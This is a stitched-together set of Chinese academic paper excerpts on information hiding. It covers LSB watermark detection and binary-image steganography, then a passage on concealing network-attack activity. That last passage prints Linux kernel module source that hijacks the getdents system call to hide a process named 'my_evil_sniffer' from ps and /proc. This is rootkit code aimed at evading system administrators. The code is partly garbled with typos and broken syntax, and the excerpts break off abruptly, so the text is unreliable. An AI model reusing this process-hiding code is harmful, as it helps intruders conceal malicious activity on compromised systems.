数字水印技术是一种新兴的信息隐藏技术,可以将秘密信息嵌入到数字媒体的冗余比特中去,从而达到不可见的目的。不同于密码术,信息隐藏技术的目的在于隐藏秘密信息的存在本身,因此具有更强的信息保密性和信息安全性。数字水印技术和隐藏信息检测技术涉及计算机、通信、编码、信号处理、数理统计、生物视觉听觉特性等知识和技术,是一个跨学科的新领域。无论是在多媒体信号中嵌入不易察觉的秘密信息,还是从大量媒体信号中检测这类秘密信息的存在性,都是富有挑战性的技术课题。

基于数字水印算法的图像隐藏信息识别技术针对LSB嵌入方式水印的改进全盲检测算法,提高了拟合的精度,减小了载体图像初始偏移量对估计准确度的影响。在不明显增加时间复杂度的前提下,改进算法在全盲情况下估计隐藏信息长度时,可以获得比其他算法更高的检测准确度,而且适用范围也很广,是一种可以快速估计待测图像中嵌入水印序列长度的算法,具有实际应用上的价值。

2.2 逆向隐藏变换算法的图像隐藏信息识别技术

在图像信息隐藏领域使用平面隐藏图像逆向变换方法,能够利用图像像素空间位置建立图像灰度分布模型,通过灰度分布模型获取灰度数值矩阵,则可以将进行置乱处理后的灰度数值进行逆向变换,从而还原初始图像。假设将上述变换方式使用到图像隐藏信息识别中,用于信息的传递和隐藏方面,尤其是用于图像隐藏信息交换方面,则能够获取理想的图像信息隐藏效果。

根据图像中的噪声,能够对图像进行隐藏信息识别。假设噪声和隐藏信息混杂在一起,造成隐藏信息特征发生形状改变。因此,无法避免由于噪声和隐藏信息混杂造成的隐藏信息特征形变的缺陷。利用逆向隐藏变换算法进行图像隐藏信息识别,需要对隐藏信息进行置乱处理,将隐藏信息嵌入到初始图像中,并利用密钥提取隐藏信息,从而实现图像隐藏信息的识别。

基于逆向隐藏变换算法的图像隐藏信息识别方法,可以对隐藏信息进行置乱处理,将信息嵌入到初始图像中,利用密钥提取隐藏信息,从而完成了图像隐藏信息的识别。这种算法提高了识别的准确率,取得了令人满意的效果。

2.3 图像隐藏信息识别创新点分析

基于图像的信息隐藏检测算法仍不成熟,还需进一步的深入研究.而支撑这种研究的重要资源就是一个可以分析、实验的软件平台.通过分析系统平台,可以进行算法的设计、分析、实验、测试.基于图像的信息隐藏分析系统平台应该具有较好的实验功能、集成现有的算法、具有良好的可扩充性,但是对系统运行的速度要求不高。

3 结论

计算机技术的发展,使人们的生产生活越来越依赖网络,信息安全性是网络信息传输的关注重点,现有的信息隐藏技术有隐写术以及数字水印技术,虽然可以保证信息的安全,但是在加密图像信息的传输过程中,很容易出现乱码等问题,所以如何在对图像信息进行加密隐层后,保证识别后的图像质量,是研究的核心,传统的三种识别技术在图像信息隐藏传输的识别上各有优势,也各有利弊,研究人员的工作依旧是任重而道远。

参考文献

隐藏技术论文篇7

关键词:信息隐藏;二值图像;位平面;像素

中图分类号:TP391 文献标识码:A DOI:10.3969/jissn.1003-6970.2012.01.006

引言

随着计算机网络在世界范围内的普及,电子商务和各种文件的传输在网络上已经非常普遍,其中不乏国家安全保密信息、军事机密文件、个人私密信息等,因此,人们越来越感觉到数据传输中信息安全的重要性,于是,上世纪90年代开始了对信息隐藏技术的研究。

信息隐藏技术就是将秘密数字信息隐藏在其他作为载体文件的媒体信息中,在既不影响载体文件质量,又不易被人察觉的情况下;或者虽然知道隐藏信息的存在,但别人却无法知道它的具置。这样来完成对保密信息在网络上的传输。其中可以用来作为载体的媒体文件很多,比如数字图像、音频、视频和文本等。而数字图像是Web上常用的一种载体文件。

1图像隐藏技术的原理

图像之所以能作为载体文件隐藏密码信息,是因为图像是由像素排列而成。而在相邻像素点之间都有一定的空隙,正是因为有这些空隙为密码信息的隐藏带来了很大的方便。此空隙的大小被称为图像的空间分辨率。不同空间分辨率的图像其像素点间的空隙大小不同。图像的最终观察者是人,而人的视觉系统存在不完善性,即对两幅质量相同的图像的感受可能会存在比较大的差别,而又常常对两幅有点差异的图像的感受却相同。这样,就为图像的信息隐藏提供了巨大的施展空间,可将信息隐藏在对图像质量影响较小的一些位置,然后可以公开在网上传输,即使别人知道其中隐藏有秘密信息,但不知道提取方法也无法提取。

2二值图像的隐藏技术

无论是彩色图像还是灰度图像都可以分成若干个位平面,每个位平面都可以看成一幅二值图像,所以研究以图像为载体的信息隐藏技术可以转化为研究二值图像的信息隐藏技术。这里通过对一幅灰度图像的8个位平图(因灰度图像可用8bits表示,故共有8个位平面)的比较来研究二值图像的信息隐藏技术。

从上面的这组图像可以看出,越高层的位平面图像看起来与原图像越接近,而越往低层就越失去了原图像的形状特征,图8中位平面0的图像几乎接近于噪声,与原图像的相关性已经很小。曾经人们使用的信息隐藏方法常常是将保密信息直接代替最下面位平面图像中的像素,然而,这种隐藏术很容易被很多方法检测出,因此隐藏的信息并不安全。但是越是高层位平面越与原图像相近,轮廓也越清晰,所以替换其上的像素会使原图像发生很大的变化。因为二值图像是由0和1两个值确定的图像,因此它的像素点就只有两种颜色,如果随便将0、1互换,立即会引起人们的注意――尤其是某块区域其颜色为全黑或全白,将某点的颜色进行反转,则那点会特别突出。故而高层位平面上绝大多数的数据不能被替代。但如果修改的是其黑白边界的像素,将不会使图像局部失真过大而引人注意,从而可达到隐藏一定信息的目的。其规则简述如下:

一是在高层位平面图像中隐藏数据时只能在黑白边界――但不是所有边界的像素都可以。嵌入数据的像素有可能会发生0、1互换,即黑白发生变化,这将由载体图像高层位平面的像素和准备隐藏在其中的数据而定。当某像素由0和1转换后,一定不能使该像素点极其周围的属性改变――能否承载数据的属性。因为接收方要正确提取隐藏信息就要用和存储时一样的规则,若隐藏数据后该点的属性发生了变化,就无法正确提取信息。二是在隐藏信息时要使其像素在原图像中均匀分布,以免局部过度失真,并且还要满足Kerckhoff准则。为使除发件方和接收方的任何第三方不能正确提取到隐藏信息,就要对其加密。下面是其算法:

一先得到黑白边界像素点的位置。二访问像素点的顺序由密钥决定。三访问顺序由伪随机顺序分为可隐藏信息和不可隐藏信息的像素两类。可隐藏的像素发生0、1反转后不能影响其本身和周围所有像素的属性,要满足这点该像素就要满足:a.在直接相邻的4个像素中存在0和1不同的没有被隐藏数据的像素;b.每个已隐藏了数据的像素有0和1不同的未隐藏数据的相邻像素(不考虑当前像素)。这样,使不能隐藏信息的像素不会被错误的判定,因而信息可以被盲提取,并且也保证了其正确性。然而依然存在一些弊端――有些能够隐藏数据的像素没有被利用。当然可以使算法更加复杂,但是隐藏的数据量却不能增加很多。下列图中之例是根据上述规则对边缘像素是否能承载数据的判断结果。用阴影表示的像素2、4、5、6、7是可承载数据的像素。其中图9为原始图像,黑白两色分别表示0和1。数字表示伪随机访问像素的次序。图10是判断结果,其中用阴影表示可承载数据的像素。

由于能够隐藏信息的像素全部可以预先确定,故很容易利用矩阵编码等方法来提高嵌入效率,以占用较多可嵌数据的边缘像素为代价,减少对载体像素的修改量从而提高安全性。

秘密信息的提取方法:在相应的作为二值图像的位平面像素点上根据密钥逐点进行判断是否隐藏了数据,然后将其提取。

3结语

本文所讨论的隐藏技术是关于二值图像在黑白边缘上嵌入数据的规则,同时分析了在图像的较高层位平面上隐藏数据的方法。这种隐藏方法不仅可以隐藏较多的数据,而且分布均匀,因为每个位平面的黑白边缘位置不会重合,相互错开,这在视觉上也保证了较好的隐藏性,最低位平面也不会受到影响。这种方法接收方提取隐藏信息时只需要知道载体文件和密钥,不需要其他更多的信息,实现起来也简单、方便。

参考文献

[1]刘春庆,梁光岚,王朔中,等.应用二值图像信息隐藏技术实现彩色图像中的安全隐写.应用科学学报,2007,25(4):343~344

隐藏技术论文篇8

关键字:网络攻击;进程活动;隐藏;通道

中图分类号:TP393文献标识码:A文章编号:1009-3044(2007)04-10961-03

1 引言

攻击活动是一系列连续操作,若攻击时一不小心露出马脚,所有前面的攻击就会付诸东流,甚至会“引火烧身”。基于这样的认识,精明的网络攻击者特别注意隐藏攻击活动。

隐藏技术在计算机系统安全中应用十分广泛,尤其是在网络攻击中,当攻击者成功侵入一个系统后,有效隐藏攻击者的文件、进程及其加载的模块变得尤为重要。本文将讨论网络攻击活动中文件、进程、网络连接及通道的高级隐藏技术,这些技术有的已经被广泛应用到各种后门或安全检测程序之中,而有一些则刚刚起步,仍然处在讨论阶段,应用很少。

2 进程活动隐藏技术

攻击者在目标系统进行攻击活动时,产生攻击进程,如果不将这些攻击进程隐藏在系统中,就会被网络安全管理人员发现。例如,攻击者注册到某台Linux主机时,系统管理人员使用ps-ef | grep in.telnetd命令就可以察觉。攻击者可以通过修改系统的进程管理模块,替换进程管理核心模块,控制进程的显示,主要是netstat、ps等命令。下面给出Linux系统下隐藏进程源程序的例子:

extern void* sys_call_table[];

/*隐藏进程名称*/

char mtroj[]="my_evil_sniffer";

int (*orig_getdnts)(unsigned int fd,struct dirent *dirp,unsigned int coumt);

/*convert a string to number*/

int myatoi(char *str)

{ int res=0;

int mul=1;

char *ptr;

for(ptr=str+strlen(str)-1;ptr>=str;ptr--) {

if(*ptr'9')

return(-1);

res+=(*ptr-'0') *mul;

mul*=10;}

return (res);}

/*从task structure中获取进程号*/

struct task_struct *get_task(pid_t pid)

{ struct task_struck *p=current;

do { if (p->pid==pid)

returnp;

p=p->next_task; }

while (p!=current);

return NULL;}

/*从task structure获取进程名称*/

static inline char *task_name(struct task_struct *p,char *buf)

{ int i; char *name;

name=p->comm;

i=sizeof(p->comm);

do {unsigned char c=*name;

name++; i--;

*buf=c;

if (!c);

break;

if (c=='\\') {

buf[1]=c; buf+=2;

continue; }

if (c= ='\n') {

buf[0]='\\';

buf[1]='n'; buf+=2;

continue; }

buf++;}

while (i);

*buf=’\n’;

return buf+1;}

/*确认需要隐藏的进程*/

int invisible (pid_t pid)

{struct task_struct *task=get_task (pid);

char *buffer;

if (task) {

buffer=kmalloc (200,GFP_KERNEL);

memset (buffer,0,200);

task_name (task,buffer);

if (strstr (buffer, (char *) &mtroj)) {

kfree (buffer);

return 1; }

}return 0;}

int hacked_getdents (unsigned int fd, struct dirent *dirp, unsigned int count)

{unsigned int tmp,n;

int t,proc=0;

struct inode *dinode;

struct dirent dirp2,dirp3;

tmp=(*orig_getdents) (fd,dirp,count);

#idef _LINUX_DCACHE_H

dinode=current->files->fd[fd]->d_inode;

#else

dinode=current->files->f_inode;

#endif

if (dinode->i_ino= =PROC_ROOT_INO && !MAJOR (dinode->I_dev) &&

MINOR (dinode->I_dev) = =1)

proc=1;

if (tmp>0) {

dirp2= (struct dirent *) kmalloc (tmp, GFP_KERNEL);

memcpy_fromfs( dirp2,dirp,tmp);

dirp3=dirp2;t=tmp;

while (t>0) {

n=dirp3->d_reclen;

t-=n;

if ((proc && invisble (myatoi (dirp3->d_name)))) {

if (t!=0)

memmove (dirp3, (char *)dirp3+dirp3->d_reclen,t);

else

dirp3->d_off=1024;

tmp-=n;}

if (t!=0)

dirp3= (struct dirent *) ((char *) dirp3+dirp3->d_reclen);}

memcpy_tofs (dirp,dirp2,tmp);

kfree (dirp2);}

return tmp;

int init_module (void)/*module setup*/

{orig_getdents=sys_call_table[SYS_getdents];

sys_call_table[SYS_getdents]=hacked_getdents;return 0;}

void cleanup_module (void)/*module shutdown*/

{sys_call_table[SYS_getdents]=orig_getdents;}

推荐范文